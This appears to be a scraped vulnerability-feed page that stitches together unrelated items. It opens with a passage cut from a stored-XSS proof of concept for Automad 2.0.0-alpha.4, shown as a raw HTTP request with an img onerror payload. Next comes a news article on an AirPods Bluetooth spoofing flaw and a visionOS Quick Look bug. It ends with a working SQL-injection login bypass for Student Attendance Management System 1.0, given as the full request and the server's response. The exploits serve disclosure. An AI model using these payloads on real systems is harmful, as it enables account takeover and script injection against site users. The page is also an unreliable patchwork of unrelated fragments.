/_api/page/data HTTP/1.1Host: localhostContent-Length: 1822User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCvAccept: */*Origin: http://localhostReferer: http://localhost/dashboard/page?url=%2F&section=textAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie:Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cbConnection: close------WebKitFormBoundaryzHmXQBdtZsTYQYCvContent-Disposition: form-data; name="__csrf__"49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1------WebKitFormBoundaryzHmXQBdtZsTYQYCvContent-Disposition: form-data; name="__json__"{"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testingforxss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSSidentified byJerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"Youhave successfully installed Automad 2.<br><br><img src=xonerror=alert(1)><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"VisitDashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"}------WebKitFormBoundaryzHmXQBdtZsTYQYCv--*Response:*HTTP/1.1 200 OKServer: nginx/1.24.0Date: Thu, 20 Jun 2024 19:17:35 GMTContent-Type: application/json; charset=utf-8Connection: closeX-Powered-By: PHP/8.3.6Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 30`{"code":200,"time":1718911055}*Step-5:* XSS triggers when you go to homepage - http://localhost/

Automad 2.0.0-alpha.4 Cross Site Scripting

Apple has released a firmware update for AirPods that could allow a malicious actor to gain access to the headphones in an unauthorized manner.
Tracked as CVE-2024-27867, the authentication issue affects AirPods (2nd generation and later), AirPods Pro (all models), AirPods Max, Powerbeats Pro, and Beats Fit Pro.
"When your headphones are seeking a connection request to one of your previously

Firmware Security / Vulnerability

Apple has released a firmware update for AirPods that could allow a malicious actor to gain access to the headphones in an unauthorized manner.

Tracked as CVE-2024-27867, the authentication issue affects AirPods (2nd generation and later), AirPods Pro (all models), AirPods Max, Powerbeats Pro, and Beats Fit Pro.

"When your headphones are seeking a connection request to one of your previously paired devices, an attacker in Bluetooth range might be able to spoof the intended source device and gain access to your headphones," Apple said in a Tuesday advisory.

In other words, an adversary in physical proximity could exploit the vulnerability to eavesdrop on private conversations. Apple said the issue has been addressed with improved state management.

Jonas Dreßler has been credited with discovering and reporting the flaw. It has been patched as part of AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8.

The development comes two weeks after the iPhone maker rolled out updates for visionOS (version 1.2) to close out 21 shortcomings, including seven flaws in the WebKit browser engine.

One of the issues pertains to a logic flaw (CVE-2024-27812) that could result in a denial-of-service (DoS) when processing web content. The problem has been fixed with improved file handling, it said.

Security researcher Ryan Pickren, who reported the vulnerability, described it as the "world's first spatial computing hack" that could be weaponized to "bypass all warnings and forcefully fill your room with an arbitrary number of animated 3D objects" sans user interaction.

The vulnerability takes advantage of Apple's failure to apply the permissions model when using the ARKit Quick Look feature to spawn 3D objects in a victim's room. Making matters worse, these animated objects continue to persist even after exiting Safari as they are handled by a separate application.

"Furthermore, it does not even require this anchor tag to have been 'clicked' by the human," Pickren said. "So programmatic JavaScript clicking (i.e., document.querySelector('a').click()) works no problem! This means that we can launch an arbitrary number of 3D, animated, sound-creating, objects without any user interaction whatsoever."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Apple Patches AirPods Bluetooth Vulnerability That Could Allow Eavesdropping

Student Attendance Management System version 1.0 suffers from a remote SQL Injection vulnerability that allows for authentication bypass.

    ## Titles: Student Attendance Management System-1.0 Bypass AuthenticationSQLi## Author: nu11secur1ty## Date: 06/22/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The username parameter is not sanitizing well, the attacker can injectdirect queries into the login form and easily bypass the authentication ofthe admin account.STATUS: CRITICAL- Vulnerability[+]Exploits:- Exploit:```POSTPOST /student_attendance/ajax.php?action=login HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=2otv2s74md44qhb7do890mhhp4Content-Length: 104Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"Accept-Language: en-USSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept: */*X-Requested-With: XMLHttpRequestSec-Ch-Ua-Platform: "Windows"Origin: https://pwnedhost.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pwnedhost.com/student_attendance/login.phpAccept-Encoding: gzip, deflate, brPriority: u=1, iConnection: keep-aliveusername=nu11secur1ty'+or+1%3D1%23&password=stupiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiid```[+]Response```HTTPHTTP/1.1 200 OKDate: Sat, 22 Jun 2024 06:37:41 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4X-Powered-By: PHP/8.2.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 1Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-81```## Reproduce:[href](https://www.patreon.com/posts/student-system-1-106665723)## Proof and Exploit:[href](https://www.patreon.com/posts/student-system-1-106665723)## Time spent:01:25:00

Tag

#webkit